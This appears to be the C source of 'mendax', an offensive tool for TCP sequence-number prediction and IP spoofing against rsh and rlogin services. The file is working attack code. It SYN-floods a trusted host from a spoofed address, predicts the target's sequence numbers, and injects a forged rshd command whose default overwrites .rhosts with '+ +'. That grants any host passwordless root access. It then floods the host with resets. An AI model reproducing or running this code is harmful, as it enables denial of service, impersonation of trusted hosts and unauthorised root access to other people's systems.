#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <net/if.h>
#include <arpa/inet.h>

#ifndef TEST
#include "dnit.h"
#include <net/nit_if.h>
#endif

#include "mendax.h"
#include "packet.h"

char ether[6];
char *progname;
char Packet[PACKETSIZE];
unsigned long our_seq, target_seq;

#ifndef TEST
Nit *nitfd;
#endif

extern char *optarg;
extern int optind, opterr, optopt;

usage()
{
	fprintf(stderr, "Usage: %s [OPTIONS] <source> <target> [<gateway>]\n\n", progname);
	fprintf(stderr, " -p PORT       first port on localhost to occupy\n");
	fprintf(stderr, " -s PORT       server port on <source> to swamp\n");
	fprintf(stderr, " -l USERNAME   user on <source>\n");
	fprintf(stderr, " -r USERNAME   user on <target>\n");
	fprintf(stderr, " -c COMMAND    command to execute\n");
	fprintf(stderr, " -w PORT       wait for a TCP SYN packet on port PORT\n");
	fprintf(stderr, " -t            test whether attack might succeed\n");
	return(0);
}

Exit(msg, ec)
char *msg;
int ec;
{
	fprintf(stderr, "%s: %s\n", progname, msg);
	exit(ec);
}

flood_host(from, to, pktcount, flags)
struct sockaddr_in from, to;
int pktcount;
unsigned char flags;
{
	int i;
	struct opacket pak;
	static unsigned short ip_id = 0;
	unsigned long seq_num = 343289783;
	int pktlen;

	for(i = 0 ; i < pktcount; i++) {
		from.sin_port = htons(ntohs(from.sin_port) + 1);
		pktlen = gen_tcp_pak(&pak, &from, &to, ip_id++, 
			             seq_num, 0L, 0, flags);
		seq_num +=64000;
		send_pak((char *) &pak, pktlen, ether);
	}
}

/* if from->sin_port == 0, we accept packets from any
 * port on the remote machine.
 */
tcp_reply(pak, bufsize, from, timeout, flags)
char *pak;
u_int bufsize;
struct sockaddr_in *from;
struct timeval *timeout;
u_char flags;
{
	char *get_ip_pak();
	struct ip *ihdr;
	struct tcphdr *thdr;
	u_long pktlen;
	char *p;

	if((p=get_ip_pak(timeout, &pktlen)) == NULL)
		return(0);
	
	/* check whether our packet is bigger than our buffer. */
	if(pktlen > bufsize)
		return(-1);
		
	/* Yuk! I hate alignments... */
	bcopy(p, pak, (int) pktlen);

	ihdr = (struct ip *) pak;
	thdr = (struct tcphdr *) (pak + ihdr->ip_hl * 4);

	/* bahh.. we only want TCP packets */
	if(ihdr->ip_p != IPPROTO_TCP)
		return(0);

	/* those packets are not for us */
	if(from->sin_port && thdr->th_sport != from->sin_port)
		return(0);
	if(bcmp(&from->sin_addr, &ihdr->ip_src, 4))
		return(0);
	if(thdr->th_flags & flags != flags)
		return(0);

	return((unsigned int) pktlen);
}

guess_ackseq(ackseq, from, pktcount)
unsigned long *ackseq;
struct sockaddr_in *from;
unsigned pktcount;
{
	char *get_ip_pak();

	time_t starttime;
	struct ip *ihdr;
	struct tcphdr *thdr;
	struct timeval timeout;
	unsigned long pktlen;
	unsigned long seqnum, acknum;
	long diff;
	int i;
	char *pak;

	timeout.tv_sec = 1;
	timeout.tv_usec = 0;
	starttime = time(NULL);

	for(i = 0; i < pktcount;) {
		if((time(NULL) - starttime) > (time_t) WAIT)
			break;

		if(!tcp_reply(Packet, 1024, from, &timeout, TH_SYN | TH_ACK))
			continue;

		ihdr = (struct ip *) Packet;
		thdr = (struct tcphdr *) (Packet + ihdr->ip_hl * 4);

		if(i)
			diff = ntohl(thdr->th_seq) - seqnum; 

		seqnum = ntohl(thdr->th_seq);
		acknum = ntohl(thdr->th_ack);
		printf("\n sequence numbers: %lu, %lu\n", seqnum, acknum);
		if(i)
			printf(" difference: %ld\n", diff);
#ifdef DEBUG
		hexdump(Packet, pktlen);
#endif
		i++;
	}

	*ackseq = seqnum + diff;
}

tcp_handshake(src, dst, myhost)
struct sockaddr_in *src, *dst, *myhost;
{
	struct opacket *pak;
	char *buf;
	unsigned short ip_id = 0x4189;
	int i;
	
	buf = (char *) malloc(sizeof(struct opacket) * (SAMPLEPACKETS + 1) + 16);
	pak = (struct opacket *) buf;
	our_seq = 0;
	
	/* Generate TCP SYN packets with myhost's source address */
	for (i = 0; i < SAMPLEPACKETS; i ++) {
		gen_tcp_pak(pak++, myhost, dst, ip_id++, our_seq, 0L, 0, TH_SYN);
		our_seq += 64;
		myhost->sin_port = htons(ntohs(myhost->sin_port) + 1);
	}
	
	/* Generate TCP SYN packet with src's source address */
	our_seq = 0;
	gen_tcp_pak(pak, src, dst, ip_id++, our_seq, 0L, 0, TH_SYN);

	pak = (struct opacket *) buf;	
	
	/* Send packets */
	for (i = 0; i < SAMPLEPACKETS + 1; i++) {
		send_pak((char *) pak, sizeof(struct ip) +
			 sizeof (struct tcphdr), ether);
		pak++;
	}

	/* Calculate next possible sequence number */
#ifndef TEST
	guess_ackseq(&target_seq, dst, SAMPLEPACKETS);
#endif
	
	/* acknowledge dst's sequence number */
	pak = (struct opacket *) buf;
	gen_tcp_pak(pak, src, dst, ip_id++, our_seq, ++target_seq, 0, TH_SYN | TH_ACK);
	send_pak((char *) pak, sizeof(struct ip) +
		 sizeof (struct tcphdr), ether);
	
	free(buf);
}

/* When rshd is spoofed, data has to point to command to be
 * executed. For spoofing rlogind, data points to the
 * terminal type.
 */
spoof_rservice(src, dst, remuser, locuser, data)
struct sockaddr_in *src, *dst;
char *remuser, *locuser, *data;
{
		int slen;
		char string[256], *sptr;
		
		bzero(string, 256);
		sptr = string;
		slen = strlen(data) + strlen(remuser) + 
		       strlen(locuser);

		/* for rlogind */
		if(ntohs(dst->sin_port) == 513) {
			sptr += 1;
			slen += 4;
		}

		/* for rshd */
		if(ntohs(dst->sin_port) == 514) {
			sptr += 2;
			slen += 5;
		}
		/* build data string and send it to r-service */
		bcopy(remuser, sptr, strlen(remuser) + 1);
		sptr += strlen(remuser) + 1;
		bcopy(locuser, sptr, strlen(locuser) + 1);
		sptr += strlen(locuser) + 1;
		bcopy(data, sptr, strlen(data) + 1);
		bzero(Packet, PACKETSIZE);
		bcopy(string, Packet + sizeof(struct opacket), slen);
		gen_tcp_pak((struct opacket *) Packet, src, dst, 64, our_seq,
			    target_seq, slen, TH_ACK | TH_PUSH);
		send_pak(Packet, sizeof(struct ip) +
			 sizeof (struct tcphdr) + slen, ether);
		our_seq += slen;
}

/* Test if a firewall (e.g. a router) filters packets
 * with the source and destination addresses
 * we've chosen.
 */
test_host(src, dst, myhost)
struct sockaddr_in src, dst, myhost;
{
}

main(argc, argv)
int argc;
char **argv;
{
	struct sockaddr_in src, dst, myhost, gw, evil;
	struct timeval timeout;
	unsigned short myport     = 7843,
		       remoteport =  514,
		       serverport =  513,
		       waitport   =    0;
	unsigned int ch, tflag = 0, 
			 wflag = 0;
	unsigned char defcmd[256];
	unsigned char defuser[9];
	char hostname[256], 
	     string[256],
	     *sptr;
	char *locuser, *remuser, *command;

	timeout.tv_sec  = 1;
	timeout.tv_usec = 0;

	progname = argv[0];

	strcpy(defcmd, "mv .rhosts .r; echo \"+ +\" > .rhosts");
	strcpy(defuser, "root");

	command = defcmd;
	remuser	= locuser	= defuser;

	gethostname(hostname, 255);

	if (resolve_host (EVILSITE, &evil) < 0)
		Exit("cannot resolve address of EVILSITE.", 1);
	if (resolve_host (hostname, &myhost) < 0)
		Exit("cannot resolve address of localhost.", 1);
	if (resolve_host (GATEWAY, &gw) < 0)
		Exit("cannot resolve address of GATEWAY.", 1);

	while((ch = getopt(argc, argv, "c:g:l:p:r:s:tw:")) != -1) {
		switch(ch) {
			case 'c':
				command = optarg;
				break;
			case 'g':
				if (resolve_host (optarg, &gw) < 0)
					Exit("cannot resolve address of GATEWAY.", 1);
				break;
			case 'l':
				locuser = optarg;
				break;
			case 'p':
				myport = atoi(optarg);
				break;
			case 'r':
				remuser = optarg;
				break;
			case 's':
				serverport = atoi(optarg);
				break;
			case 't':
				tflag++;
				break;
			case 'w':
				wflag++;
				waitport = atoi(optarg);
				break;
			case '?':
			default:
				usage();
				exit(1);
		}
	}

	if (argc - optind !=2) {
		usage();
		exit(1);
	}

	if (resolve_host (argv[optind++], &src) < 0)
		Exit("cannot resolve hostname.", 1);
	if (resolve_host (argv[optind++], &dst) < 0)
		Exit("cannot resolve hostname.", 1);

	src.sin_port 	= htons(serverport);
	dst.sin_port 	= htons(remoteport);
	myhost.sin_port	= htons(myport);
	evil.sin_port	= htons(200);

#ifndef TEST
	if (arp(&gw.sin_addr, ether) < 0)
		Exit("arp failed for gateway. gateway not on local subnet ?", 1);
	if ((nitfd = NitOpen("le0", NIT_BUFFER, 0, timeout,
	    NI_TIMESTAMP | NI_DROPS | NI_LEN)) == NULL)
		Exit("cannot initialize /dev/nit.", 1);
#endif
	
#ifndef NOFLOOD
	/* flood source host with TCP SYN packets */

	printf("flooding source with TCP SYN packets from %s.\n", EVILSITE);
	flood_host(evil, src, FLOODPACKETS, TH_SYN);
#endif

	if(tflag) {
		if(test_host(src, dst, myhost) < 0)
			printf("attack will probably fail.\n");
		else
			printf("host seems to be unprotected for this attack.\n");
	}
	else {
		/* send TCP SYN packets to target. Calculate the difference
		   of the sequence numbers in the received TCP SYN|ACK packets.
		   The last packet's source address is the address of the
		   host we want to impersonate... Then acknowledge TCP SYN|ACK
		   packet with the sequence number we guessed */

		printf("sampling sequence numbers and setting up TCP handshake.\n");
		tcp_handshake(&src, &dst, &myhost);

		printf("spoofing rshd.\n");
		spoof_rservice(&src, &dst, remuser, locuser, command);
		
		if(wflag) {
			time_t starttime;
			unsigned int flag = 0;

			starttime = time(NULL);
			dst.sin_port = 0;
			while(time(NULL) - starttime < WAIT) {
				if(tcp_reply(Packet, 1024, &dst, &timeout, TH_SYN)) {
					flag++;
					break;
				}
			}
			dst.sin_port 	= htons(remoteport);

			if(flag)
				printf("spoofing seemed to be successful.\n");
			else
				printf("No TCP packet received within timeout period.\n");
		}
		else
			sleep(3);

		/* Resetting connection */
		printf("resetting TCP connection.\n");
		gen_tcp_pak(Packet, &src, &dst, 128, our_seq, 
			    target_seq, 0, TH_RST);
		send_pak(Packet, sizeof(struct ip) +
			 sizeof (struct tcphdr), ether);
	}
#ifndef NOFLOOD
	/* Reset source host's serverport using TCP RST packets.
	   We don't want to wait for a timeout, do we ? */

	printf("resetting source.\n");
	flood_host(evil, src, FLOODPACKETS, TH_RST);
#endif

#ifndef TEST
	NitClose(nitfd);
#endif
	exit(0);
}
